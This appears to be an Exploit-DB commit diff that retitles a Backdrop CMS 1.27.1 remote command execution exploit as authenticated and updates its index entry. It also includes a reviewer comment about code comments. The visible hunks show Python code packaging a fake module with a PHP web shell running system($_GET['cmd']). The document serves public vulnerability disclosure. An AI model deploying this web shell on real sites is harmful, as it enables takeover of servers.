DB: 2024-06-08

2 changes to exploits/shellcodes/ghdb

Backdrop CMS 1.27.1 - Remote Command Execution (RCE)
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
Exploit-DB 2024-06-08 00:16:25 +00:00
parent 8a32e340d5
commit a99f08beda
2 changed files with 67 additions and 72 deletions


@ -1,4 +1,4 @@
# Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE) # Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
# Date: 04/27/2024 # Date: 04/27/2024
# Exploit Author: Ahmet Ümit BAYRAM # Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://backdropcms.org/ # Vendor Homepage: https://backdropcms.org/
@ -10,8 +10,6 @@ import os
import time import time
import zipfile import zipfile
def create_files(): def create_files():
info_content = """ info_content = """
type = module type = module
@ -33,8 +31,7 @@ version = 1.27.1
timestamp = 1709862662 timestamp = 1709862662
""" """
shell_info_path = "shell/shell.info" shell_info_path = "shell/shell.info"
os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur
oluşturur
with open(shell_info_path, "w") as file: with open(shell_info_path, "w") as file:
file.write(info_content) file.write(info_content)
@ -59,13 +56,11 @@ system($_GET['cmd']);
shell_php_path = "shell/shell.php" shell_php_path = "shell/shell.php"
with open(shell_php_path, "w") as file: with open(shell_php_path, "w") as file:
file.write(shell_content) file.write(shell_content)
return shell_info_path, shell_php_path return shell_info_path, shell_php_path
def create_zip(info_path, php_path): def create_zip(info_path, php_path):
zip_filename = "shell.zip" zip_filename = "shell.zip"
with zipfile.ZipFile(zip_filename, 'w') as zipf: with zipfile.ZipFile(zip_filename, 'w') as zipf:
# Dosyaları shell klasörü altında sakla
zipf.write(info_path, arcname='shell/shell.info') zipf.write(info_path, arcname='shell/shell.info')
zipf.write(php_path, arcname='shell/shell.php') zipf.write(php_path, arcname='shell/shell.php')
return zip_filename return zip_filename
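Review bot: The trailing comment on the `os.makedirs(...)` line in `create_files()` reads `# Klasörüoluşturur` on the new side as rendered here: joining the previously wrapped comment removed the stray `oluşturur` line but dropped the space between the two words, and the comment is still not in English. I would write it as `# create the shell/ directory if it does not exist`. The retitle to "Authenticated" is carried only by the title line in this section; if the header lines outside the visible hunks do not already state it, a line such as `# Prerequisite: valid login allowed to install modules (presumed from the module package built here; confirm)` would let readers triaging exposure see the precondition without reading the code. `create_files()` spans several hunks, so its full body is not visible here.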


@ -14593,7 +14593,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip, 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,, 51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,, 52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-06-07,1,,,,,,
51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info
